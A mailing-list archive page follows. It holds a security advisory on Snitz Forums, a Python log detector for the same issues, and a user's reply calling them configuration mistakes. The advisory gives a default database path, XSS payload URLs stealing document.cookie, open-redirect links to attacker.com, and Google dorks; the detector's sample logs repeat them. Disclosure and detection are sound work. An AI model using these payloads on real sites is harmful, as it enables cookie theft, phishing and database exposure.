Mailing List Archive

[HSC] Snitz Forums Multiple Vulnerabilities


Snitz Forums Default Database installation allows remote users to download the database which contains critical information. As a result, an attacker exploiting this vulnerability will be able to obtain detailed information. An attacker may leverage xss issue to have arbitrary script code execute in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.



Hackers Center Security Group (http://www.hackerscenter.com)
Credit: Doz


Remote: YES
Class: Improper installation configuration, XSS & validation.


Version: 3.4.06 & Previous!
Vendor: http://forum.snitz.com/




* Attackers can exploit these issues via a web client.


- Default Database Disclosure:

/forum/snitz_forums_2000.mdb

Solution:

Change the database name. The name should be a combination of letters and numbers.
That makes it hard for anyone to guess the name of your database.


- Information Leakage: (Version: 3.4.05)

Will show the Database path: /forum/whereami.asp


- Cross-Site Scripting: (all versions)

/Forums/setup.asp?RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E

(Versions: 3.4.05 & Below) /login.asp?target=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E


- Redirecting weakness/ Phishing Hole:

Forums/login.asp?target=http://attacker.com/virus.exe

Forums/login.asp?target=http://attacker.com/login.asp



Google Dork:

- Powered By: Snitz Forums 2000
- Forum-Setup Page




Only becoming a hacker you can stop a hacker. Where can you learn without having to pay thousands? - http://kit.hackerscenter.com/ - The most comprehensive security pack you will ever find on the net!
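Detection logic for the four issues listed in this advisory, run over sample web-server log lines. This is an added example, not code from the advisory or from the Snitz project; it assumes a simplified IIS W3C log layout and a monitored hostname of forum.example.com, and the log lines (including the attacker.example host) are constructed.

```python
# Added example (not the advisory's or Snitz's code): flag the requests above in
# web-server logs. Lines are constructed, in a simplified IIS W3C layout (assumed):
#   date time c-ip cs-method cs-uri-stem cs-uri-query sc-status   ("-" = no query)
from urllib.parse import parse_qs, unquote, urlsplit

SITE_HOST = "forum.example.com"  # assumed hostname of the monitored site

def classify(stem, query):
    """Return the advisory issues one request matches (empty list if none)."""
    findings, stem_l = [], stem.lower()
    query = "" if query == "-" else query
    if stem_l.endswith("/snitz_forums_2000.mdb"):   # default database download
        findings.append("default-db-download")
    if stem_l.endswith("/whereami.asp"):            # physical DB path leak
        findings.append("whereami-path-leak")
    if stem_l.endswith(("/login.asp", "/setup.asp")):
        for key, values in parse_qs(query, keep_blank_values=True).items():
            if key.lower() not in ("target", "mail"):
                continue
            for value in values:
                v = unquote(value).lower()  # second decode catches %25-encoding
                if "<script" in v or "javascript:" in v:
                    findings.append("xss-probe")
                host = urlsplit(v).netloc   # absolute URL => off-site redirect
                if key.lower() == "target" and host and host != SITE_HOST:
                    findings.append("open-redirect")
    return findings

def scan_log(lines):
    """Return (line_no, client_ip, stem, status, findings) for flagged requests."""
    hits = []
    for n, line in enumerate(lines, 1):
        parts = line.split()
        if line.startswith("#") or len(parts) < 7:
            continue
        _d, _t, c_ip, _m, stem, query, status = parts[:7]
        findings = classify(stem, query)
        if findings:
            hits.append((n, c_ip, stem, status, findings))
    return hits

SAMPLE_LOG = [  # constructed; attacker.example is a placeholder host
    "2005-06-01 10:00:07 203.0.113.5 GET /forum/snitz_forums_2000.mdb - 200",
    "2005-06-01 10:00:09 203.0.113.5 GET /forum/whereami.asp - 200",
    "2005-06-01 10:01:15 198.51.100.9 GET /Forums/setup.asp "
    "RC=3&MAIL=%22%3E%3Cscript%3Ealert(document.cookie);%3C/script%3E 200",
    "2005-06-01 10:02:30 198.51.100.9 GET /Forums/login.asp "
    "target=http://attacker.example/login.asp 302",
    "2005-06-01 10:03:00 192.0.2.7 GET /Forums/login.asp target=/Forums/default.asp 302",
]
```

A status of 200 on the .mdb hit means the file was actually served, which is the case to treat as a data exposure rather than a failed probe.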
RE: [HSC] Snitz Forums Multiple Vulnerabilities
> - Default Database Disclosure:
> /forum/snitz_forums_2000.mdb
> Solution:
> Change the database name. The name should be a combination of
> letters and numbers.
>
> That makes it hard for anyone to guess the name of your database.

As a long-time Snitz user who has installed it far more times than one would
consider sane, I question the validity of this advisory. While it is true
that the default database location is insecure, it is very clear in the
readme file that the database should be moved or at the very least renamed:

"Change the database name:
When using an Access database, all the data is stored in a single file,
unlike the other databases. So caution should be taken in where you store
your Access database as it can be downloaded by anyone if they know the
path.
If you store your Access database in a folder outside of your www folder (or
wherever you keep the files for the rest of your site), then you should be
safe because no one can download your database if it is outside of your www
folder.
If you store your database in a cgi-bin folder, or in your www folder, then
it is strongly recommended that you change the default database name from
snitz_forums_2000.mdb to a cryptic or not easy to guess name. The name
should be a combination of letters and numbers. That makes it hard for
anyone to guess the name of your database."
-Quoted from Snitz Forums 2000 README.HTM

The solution in this advisory is the same as mentioned in the README.HTM
setup instructions, and still not a good one compared to moving the file to
a directory not accessible to the public.

> - Information Leakage: (Version: 3.4.05)
> Will show the Database path: /forum/whereami.asp
>

The whereami.asp is not installed by default. It is in a ZIP file that is
optional to extract. And it will only provide the physical location of the
database if the database is in a web accessible area with the whereami.asp
file.

These are configuration issues, not security vulnerabilities.

---
Aaron Cake
Technical Services
Advanced Computer Ideas
Phone: 1-519-433-0279
Fax: 1-519-433-5413